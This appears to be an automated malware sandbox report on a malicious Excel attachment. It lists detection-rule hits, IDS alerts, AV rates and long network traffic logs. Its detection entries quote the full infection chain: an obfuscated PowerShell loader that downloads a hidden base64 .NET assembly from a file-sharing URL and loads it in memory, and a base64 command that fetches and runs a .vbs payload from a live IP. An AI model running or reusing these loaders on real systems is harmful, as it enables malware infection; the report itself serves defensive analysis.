      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 
hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmoriz
      Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3148, TargetFilename: C:\Users\user\AppData\Local\Temp\k1rszaqi.mg2.ps1

      Data Obfuscation

      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRu
YXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3148, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline", ProcessId: 3328, ProcessName: csc.exe
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-11-28T07:28:05.786269+0100 | 2024197 | 1 | A Network Trojan was detected | 172.245.123.29 | 80 | 192.168.2.22 | 49164 | TCP
      2024-11-28T07:28:11.300068+0100 | 2024197 | 1 | A Network Trojan was detected | 172.245.123.29 | 80 | 192.168.2.22 | 49166 | TCP
      2024-11-28T07:28:05.786085+0100 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49164 | 172.245.123.29 | 80 | TCP
      2024-11-28T07:28:11.300059+0100 | 2024449 | 1 | Attempted User Privilege Gain | 192.168.2.22 | 49166 | 172.245.123.29 | 80 | TCP
      2024-11-28T07:28:17.864630+0100 | 2858795 | 1 | A Network Trojan was detected | 192.168.2.22 | 49167 | 172.245.123.29 | 80 | TCP

      AV Detection

      Source: Swiftcopy.xla.xlsx | Virustotal: Detection: 14%
      Source: Swiftcopy.xla.xlsx | ReversingLabs: Detection: 15%
      Source: Swiftcopy.xla.xlsx | Joe Sandbox ML: detected

      Phishing

      Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthings[1].hta, type: DROPPED
      Source: unknown | HTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.22:49168 version: TLS 1.0
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: unknown | HTTPS traffic detected: 152.231.117.86:443 -> 192.168.2.22:49163 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 152.231.117.86:443 -> 192.168.2.22:49165 version: TLS 1.2
      Source: Binary string: CallSite.Target.pdb source: powershell.exe, 0000000F.00000002.536967212.000000001C282000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Hp6pdblib.pdb source: powershell.exe, 0000000F.00000002.536967212.000000001C251000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: .pdb1 source: powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: dbpdbtem.pdb source: powershell.exe, 0000000F.00000002.536967212.000000001C251000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.pdbhP source: powershell.exe, 00000008.00000002.519013010.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.pdb source: powershell.exe, 00000008.00000002.519013010.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp

      Software Vulnerabilities

      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\mshta.exe
      Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global traffic | DNS query: name: ljg.cl
      Source: global traffic | DNS query: name: 3105.filemail.com
      Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 152.231.117.86:443
      Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
